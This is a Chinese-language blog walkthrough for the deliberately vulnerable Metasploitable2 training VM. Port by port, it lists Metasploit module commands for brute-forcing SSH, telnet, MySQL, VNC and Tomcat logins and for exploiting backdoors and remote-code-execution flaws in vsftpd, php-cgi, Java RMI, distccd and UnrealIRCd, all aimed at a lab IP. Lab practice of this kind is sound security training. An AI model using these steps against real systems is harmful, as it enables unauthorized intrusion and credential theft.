Metasploit2通关教程

Metasploitable2靶机介绍:

Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。这个版本的虚拟系统兼容VMware。当虚拟系统启动之后,使用用户名:msfadmin 和密码msfadmin登陆 适用于学习网络安全新手学习

Metasploitable2靶机下载:

https://pan.baidu.com/s/1SE1xoRtXMsrj_34FJQXT2Q
提取码:810r

Metasploitable2靶机安装:

下载好了把安装包解压 然后试用VMware即可。

Metasploitable2靶机漏洞详解:

渗透机:kali IP :192.168.28.128

靶机IP :192.168.28.141

漏洞清单:

21端口

search vsftpd
use 0
set rhosts 192.168.28.141
run

22端口==直接暴力破解

Search  ssh_login       搜索模块
Use  auxiliary/scanner/ssh/ssh_login    使用模块
Set  RHOST 192.168.28.141    设置目标地址
Set   USER_FILE  XXX   设置用户字典路径
Set   PASS_FILE  XXX   设置字典密码路径
Set   THREADS   100   设置线程是100
Run

23端口(telnet):

search telnet_login
use 1
Set  RHOST 192.168.28.141    设置目标地址
Set   USER_FILE  XXX   设置用户字典路径
Set   PASS_FILE  XXX   设置字典密码路径
Set   THREADS   100   设置线程是100
Run

80端口

拿到站点进行渗透老套路====信息搜集啥的

search php-cgi
use 0
set rhost 192.168.28.141
run
background====将shell后置后台

139端口,445端口

这两个都是smb类型的,是共享服务,首选我们需要知道它的共享目录有哪些,枚举之后可看到一共发现有5个如下

search smb_eumn
  	  0  auxiliary/scanner/smb/smb_enumshares
use 0
set rhost 192.168.28.141

在使用一个脚本:use auxiliary/admin/smb/samba_symlink_traversal

1099端口

一个Java反序列化命令执行漏洞,可以看到已经getshell

原理:Java RMI Server 的RMI注册表和RMI激活服务的默认配置存在安全漏洞,可被利用导致

search java rmi
		4   exploit/multi/misc/java_rmi_server  
use 4
set rhosts 192.168.28.141
run

1524端口ingreslock

在少数服务器上存在一个古老的令人惊讶的“ingreslock”后门,监听1524端口。在过去的十年里,它经常被用于入侵一个暴露的服务器。它的利用是如此简单。

telnet 192.168.28.141 1524

3306数据库默认端口

既然运行远程连接,直接爆破,账号root密码为空然后登入

使用模块:use auxiliary/scanner/mysql/mysql_login

search mysql_login
use 0
set username root

3632 distccd服务

远程命令执行漏洞,直接exp

使用模块:use exploit/unix/misc/distcc_exec

search distccd
use 0
set rhost 192.168.28.141

后面几个利用教程就不详细展开了!!!

5432端口

postgresq爆破

5900端口vnc服务

vnc服务有两部分构成,一部分是服务,一个是客户端,我们进行爆破

使用模块爆破:use auxiliary/scanner/vnc/vnc_login

6667端口

6697 IRC服务, IRC服务这个版本存在后门漏洞,直接exp后getshell

使用模块:use exploit/unix/irc/unreal_ircd_3281_backdoor

8180端口

暴力破解账号密码:tomcat;tomcat

8787端口drb服务

有个远程代码执行漏洞

使用模块:use exploit/linux/misc/drb_remote_codeexec

posted @   阜城小柳  阅读(675)  评论(0编辑  收藏  举报
相关博文:
· 计算机网络基础
· Linux 内核概念和学习路线
· 看完这篇 教你玩转渗透测试靶机——Metasploitable2
· 20222325 2024-2025-1 《网络与系统攻防技术》实验六实验报告
· 20222315 2024-2025-1 《网络与系统攻防技术》实验六实验报告
阅读排行:
· Manus重磅发布:全球首款通用AI代理技术深度解析与实战指南
· 被坑几百块钱后,我竟然真的恢复了删除的微信聊天记录!
· 没有Manus邀请码?试试免邀请码的MGX或者开源的OpenManus吧
· 园子的第一款AI主题卫衣上架——"HELLO! HOW CAN I ASSIST YOU TODAY
· 【自荐】一款简洁、开源的在线白板工具 Drawnix
点击右上角即可分享
微信分享提示